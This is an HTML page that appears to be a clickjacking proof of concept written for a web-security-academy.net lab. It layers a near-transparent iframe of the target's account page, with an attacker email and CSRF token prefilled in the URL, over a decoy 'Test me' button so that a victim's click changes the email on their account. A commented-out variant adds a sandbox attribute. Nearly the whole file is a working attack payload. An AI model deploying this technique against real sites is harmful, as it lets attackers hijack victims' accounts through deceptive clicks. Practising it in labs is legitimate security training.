<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        iframe {
            position: relative;
            width: 1530px;
            height: 620px;
            opacity: 0.0001;
            z-index: 2;
        }

        div {
            position: absolute;
            top: 490px;
            left: 220px;
            z-index: 1;
        }
    </style>
</head>

<body>
    <div>Test me</div>
    <iframe
        src="https://0a7400cc03f9a9c680d29ea50076006b.web-security-academy.net/my-account?email=hacker@gmail.com&csrf=gRFY86RNDU89bFKdxJvrzKHAviUXzKUq"></iframe>
</body>
<!-- <iframe src="" sandbox="allow-forms" frameborder="0"></iframe> -->
</html>
<!-- 
<style>
    iframe {
        position: relative;
        width:1530px;
        height:620px;
        opacity:0.0001;
        z-index: 2;
    }
    div {
        position: absolute;
        top:490px;
        left:220px;
        z-index: 1;
    }
</style>
<div>Test me</div>
<iframe  sandbox="allow-forms" src="https://0a7400cc03f9a9c680d29ea50076006b.web-security-academy.net/my-account?email=mr_robot1234@gmail.com&csrf=gRFY86RNDU89bFKdxJvrzKHAviUXzKUq"></iframe>

 -->